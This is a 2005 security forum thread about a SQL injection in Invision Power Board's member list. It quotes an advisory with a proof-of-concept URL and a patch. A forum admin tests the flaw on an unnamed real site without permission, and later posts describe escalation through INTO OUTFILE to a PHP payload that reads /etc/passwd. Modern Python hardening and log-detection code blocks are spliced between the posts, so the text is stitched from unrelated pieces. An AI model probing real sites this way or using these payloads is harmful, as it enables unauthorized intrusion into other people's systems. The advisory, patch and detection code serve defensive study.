IT Security and Insecurity Portal
Sql Injection in Invision Power Board

Posted: Tue Apr 12, 2005 12:52 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Just found this advisory:
http://www.securityfocus.com/archive/1/395515/2005-04-09/2005-04-15/0
Quote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab's Security Advisory (http://www.digitalparadox.org/services.ah)
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Severity: Medium
Title: Invision board 1.3.1 and below are vulnerable to a sql injection vulnerability
[PATCH INCLUDED]
Date: 09/04/2005
Vendor: Invision Power Services
Vendor Website: http://www.invisionboard.com/
Summary: Invision board 1.3.1 and lower are vulnerable to a sql injection vulnerability
which is caused by the non validation of input in the $this->first variable
**********************************************************************************************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more
at http://www.digitalparadox.org/services.ah
**********************************************************************************************************
Proof of Concept Exploit:
http://localhost/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION
**************
Patch info
**************
A patched version of the vulnerable file can be found at, http://www.digitalparadox.org/memberlist.txt
Just replace /uploads/sources/memberlist.php with this, and it will be fixed.
A simple patch can be,
In /uploads/sources/memberlist.php on Line 274 add this code
[CODE BEGINS]
if (!is_numeric($this->first)) {
$this->first = "0";
}
[CODE ENDS]
So it should finally look like,
[CODE BEGINS]
$this->output .= $this->html->Page_header( array( 'SHOW_PAGES' =>
$links) );
//-----------------------------
// START THE LISTING
//-----------------------------
if (!is_numeric($this->first)) {
$this->first = "0";
}
$DB->query("SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title,
m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
[CODE ENDS]
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com,
please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Look out for my soon-to-come-out book on Secure coding with
PHP.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQlqrUSZV5e8av/DUEQJMtQCfZWYAAYfGX5zfmCWHxMGZffi87tUAnRGj
hAJ8nVzhK+VIlL4iPxDJRh02
=n3TC
-----END PGP SIGNATURE-----

So why not test it in the real world - picked a random site:
Code:
http://****.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=f00bar

And we can see a nice debug message:
Code:
There appears to be an error with the *** Community Forums database.
You can try to refresh the page by clicking here, if this does not fix the error, you can contact the board administrator by clicking here
Error Returned
mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM
We apologise for any inconvenience

So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality
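An added example (not code from the advisory, from this thread, or from Invision Power Board) that reproduces the offset handling discussed above in Python against an in-memory SQLite table, since SQLite accepts the same `LIMIT offset,count` form as MySQL. The table columns and sample rows are constructed to mirror the `ibf_members` columns in the error message and are assumptions, not the real IPB schema. It shows the vulnerable string concatenation failing on the `st=f00bar` value from the test above, and a strict replacement for the advisory's `is_numeric()` check: PHP's `is_numeric()` also accepts values such as `1.5` or `1e3` (and, before PHP 7, hex strings such as `0x1A`), which pass the patch but are still not valid `LIMIT` operands, so here the offset is only accepted when it is a plain string of digits and is then bound as an integer parameter.

```python
import re
import sqlite3

# Constructed sample rows (an assumption, not the real IPB schema): only the
# columns needed for the listing query are kept.
SAMPLE_MEMBERS = [
    (1, "alice", 12, 1),
    (2, "bob", 5, 1),
    (3, "carol", 3, 1),
    (4, "dave", 7, 2),   # different group, filtered out by m.mgroup='1'
]


def make_db():
    """Build an in-memory table named like the one in the thread's error message."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE ibf_members (id INTEGER, name TEXT, posts INTEGER, mgroup INTEGER)"
    )
    con.executemany("INSERT INTO ibf_members VALUES (?, ?, ?, ?)", SAMPLE_MEMBERS)
    return con


def vulnerable_query(first, max_results=30):
    """Mirror of the original construction: the 'st' parameter ($this->first)
    is concatenated straight into the LIMIT clause."""
    return (
        "SELECT m.name, m.id FROM ibf_members m "
        "WHERE m.id > 0 AND m.mgroup='1' "
        f"ORDER BY m.name asc LIMIT {first},{max_results}"
    )


def safe_offset(value, default=0):
    """Strict replacement for the advisory's is_numeric() check.

    Only a plain string of ASCII digits is accepted; anything else (letters,
    signs, decimals, exponents, hex, whitespace, SQL keywords) falls back to
    the default offset, as the advisory's patch does for non-numeric input.
    The length cap keeps the value inside a 32-bit integer.
    """
    if isinstance(value, str) and re.fullmatch(r"[0-9]{1,9}", value):
        return int(value)
    return default


def run_listing(con, first, hardened):
    """Return the member names for one page of the listing.

    hardened=False reproduces the vulnerable concatenation and returns the
    database error text instead of raising; hardened=True validates the offset
    and passes both LIMIT operands as bound parameters.
    """
    if hardened:
        sql = (
            "SELECT m.name, m.id FROM ibf_members m "
            "WHERE m.id > 0 AND m.mgroup='1' "
            "ORDER BY m.name asc LIMIT ?,?"
        )
        return [row[0] for row in con.execute(sql, (safe_offset(first), 30))]
    try:
        return [row[0] for row in con.execute(vulnerable_query(first))]
    except sqlite3.OperationalError as exc:
        # MySQL reports a syntax error near 'f00bar,30'; SQLite reports an
        # unknown column. Either way the page breaks and leaks the query.
        return f"ERROR: {exc}"


if __name__ == "__main__":
    db = make_db()
    print(run_listing(db, "f00bar", hardened=False))
    print(run_listing(db, "f00bar", hardened=True))
    print(run_listing(db, "2", hardened=True))
```

The same strict check belongs on `max_results`, which the advisory's patch does not touch; binding both `LIMIT` operands as parameters, as `run_listing` does, removes the string concatenation entirely instead of relying on a validator in front of it.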

Posted: Tue Apr 12, 2005 6:34 pm
Alkaen
Regular user
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair

All steps are okay.. but how can I exploit this SQL injection?!
So that means, what do I have to do after the error message appears?
Thanks..

Posted: Wed Apr 13, 2005 4:05 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Does Invision use SHA1???? I never knew...... and I never used it. I've got a cracked version of vBulletin 3.0 that I've used, but I've never used Invision, trial or full.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Wed Apr 13, 2005 11:42 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Alkaen wrote:
All steps are okay.. but how can I exploit this SQL injection?!
So that means, what do I have to do after the error message appears?
Thanks..

Well, it's complicated. There is a need for blind SQL attack methods and subqueries (I suggest the benchmark() function). But as far as I know, most of the MySQL databases on the Internet right now are version < 4.1.x and so have no subquery functionality

Posted: Wed Apr 13, 2005 11:45 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yes, I'm still wondering why Fedora Core 3 came with MySQL 3; it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.

Posted: Wed Apr 13, 2005 11:48 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

shai-tan wrote:
Yes, I'm still wondering why Fedora Core 3 came with MySQL 3; it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.

Yeah, this is frustrating, when you have found some nice SQL injection hole in some prominent website and then see - b00m - no UNION possibilities.
Wtf? It's the 21st century, webmasters and admins!!! C'mon, we want UNION tricks to be working!! We want subqueries to be working!! And in the future, we want multiple queries on the MySQL/PHP platform too (like now in MSSQL/Oracle)

Posted: Wed Apr 13, 2005 11:51 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

They take the things you love and don't bother to give a few things to replace them.

Posted: Fri Apr 15, 2005 1:10 pm
Ratinho
Beginner
Joined: Mar 20, 2005
Posts: 2

Hey..

Posted: Mon Apr 25, 2005 2:40 pm
Dcrab
Valuable expert
Joined: Apr 25, 2005
Posts: 7

Hey,
Waraxe: you hit the money with that post about frustration lol.. after all that auditing, when you come to know it's not exploitable.. lol, that's frustrating, you probably know what I mean heh. Btw, if you MSN, catch me at dcrab[at]hackerscenter[dotdotodotdotodotspamdotdotdot]com; it'll be nice to talk to you.

Posted: Mon Apr 25, 2005 4:46 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Hi, Dcrab! Nice to see ya! So many advisories from you ... it's amazing
If this continues, then soon I won't have any targets to analyze

Posted: Mon Apr 25, 2005 6:32 pm
Dcrab
Valuable expert
Joined: Apr 25, 2005
Posts: 7

haha I know what you mean.. I have already run out of ideas :p do you MSN..?

Re: Sql Injection in Invision Power Board

Posted: Mon Apr 25, 2005 10:21 pm
cXIb8O3
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg

waraxe wrote:
So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality

hym.. look.. if you have the right in MySQL... (INTO), then LIMIT 0,10 INTO OUTFILE '/path/file.php'/*
if you can insert PHP code (example <? exec('cat /etc/passwd'); ?>) into m.name, m.id, m.posts, m.joined, m.mgroup, m.email, m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions...
you can include the file.

Re: Sql Injection in Invision Power Board

Posted: Mon Apr 25, 2005 10:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

cXIb8O3 wrote:
waraxe wrote:
So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality

hym.. look.. if you have the right in MySQL... (INTO), then LIMIT 0,10 INTO OUTFILE '/path/file.php'/*
if you can insert PHP code (example <? exec('cat /etc/passwd'); ?>) into m.name, m.id, m.posts, m.joined, m.mgroup, m.email, m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions...
you can include the file.

From the MySQL manual:
http://dev.mysql.com/doc/mysql/en/select.html
Code:
13.1.7. SELECT Syntax
13.1.7.1. JOIN Syntax
13.1.7.2. UNION Syntax
SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr, ...
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name']
[FROM table_references
[WHERE where_definition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_definition]
[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[FOR UPDATE | LOCK IN SHARE MODE]]

As far as I can understand, after "LIMIT x,y" maybe only subqueries can be useful...
But this is right - if we have an SQL injection with INSERT INTO possibility and the current MySQL user has file operation permissions, then we can try to write out a file with PHP/Perl/whatever code inside, and therefore such an SQL injection can possibly be turned into shell-level access.

Posted: Mon Apr 25, 2005 10:33 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Dcrab wrote:
haha I know what you mean.. I have already run out of ideas :p do you MSN..?

I prefer a quiet, peaceful life, so no MSN/YM/ICQ/IRC/Skype/cellphone
But in very rare cases I use Yahoo Messenger. You can email me, I am checking my mailbox many times a day.

Re: Sql Injection in Invision Power Board

Posted: Mon Apr 25, 2005 10:48 pm
cXIb8O3
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg

waraxe wrote:
mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM

in this query... we can't use UNION because there is an ORDER BY ;] but after LIMIT you can use UNION
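An added detection example (not code from this thread or from Invision Power Board): a small Python scan over constructed Apache-style access-log lines that picks out requests to the member list (`act=Members`) whose `st` parameter is not a plain number, and labels the post-`LIMIT` constructs brought up in this thread: `INTO OUTFILE`/`DUMPFILE` as raised by cXIb8O3, `PROCEDURE` from the manual excerpt, `UNION`, and time-based `BENCHMARK()` probes as waraxe suggested (plus `SLEEP()`, which later MySQL versions added). The log lines, IP addresses and file paths are made up for the example; the `act=Members` filter matches the vulnerable URL from the advisory and is deliberately narrow, so other `st` uses such as topic views are not flagged.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-style log lines for the example (not from any real
# server). Line 1 is the probe from the thread, line 3 is the INTO OUTFILE idea
# raised later in the thread, line 4 is a normal topic view that also uses 'st'.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Apr/2005:08:51:04 +0000] "GET /forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=f00bar HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Apr/2005:08:51:09 +0000] "GET /forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=30 HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Apr/2005:08:52:30 +0000] "GET /forums/index.php?act=Members&max_results=30&filter=1&st=0,30%20INTO%20OUTFILE%20'/var/www/html/x.php'/* HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Apr/2005:08:53:01 +0000] "GET /forums/index.php?showtopic=12&st=15 HTTP/1.1" 200 20311 "-" "Mozilla/5.0"
203.0.113.13 - - [12/Apr/2005:08:54:44 +0000] "GET /forums/index.php?act=Members&st=0,30%20PROCEDURE%20ANALYSE() HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# Apache "combined" request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructs that are syntactically possible after "LIMIT x,y" in MySQL,
# most specific first. Matching is done on the URL-decoded parameter value.
SIGNATURES = [
    ("file-write", re.compile(r"INTO\s+(OUTFILE|DUMPFILE)", re.I)),
    ("procedure-analyse", re.compile(r"PROCEDURE\s+ANALYSE", re.I)),
    ("union", re.compile(r"\bUNION\b", re.I)),
    ("time-based", re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.I)),
]


def classify_offset(st):
    """Return None for a legitimate offset, else a label for the suspicious value.

    A plain digit string is what the memberlist pagination should ever send;
    anything else is at least a malformed offset and, if it carries one of the
    known post-LIMIT constructs, a more specific attack label.
    """
    if re.fullmatch(r"[0-9]+", st):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(st):
            return label
    return "malformed-offset"


def detect(log_text):
    """Scan log lines and return one finding per suspicious memberlist request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line; skip rather than guess
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)
        # Only the member list concatenates 'st' into LIMIT per the advisory.
        if params.get("act", [""])[0].lower() != "members":
            continue
        for st in params.get("st", []):
            label = classify_offset(st)
            if label:
                findings.append(
                    {"ip": m.group("ip"), "ts": m.group("ts"), "st": st, "label": label}
                )
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['label']}: st={f['st']!r}")
```

A `file-write` hit is the one to treat as an incident rather than a probe: if the database account had the FILE privilege, the request may already have dropped a file under the web root, so the next step is to check the web directory for new `.php` files with a modification time matching the log entry.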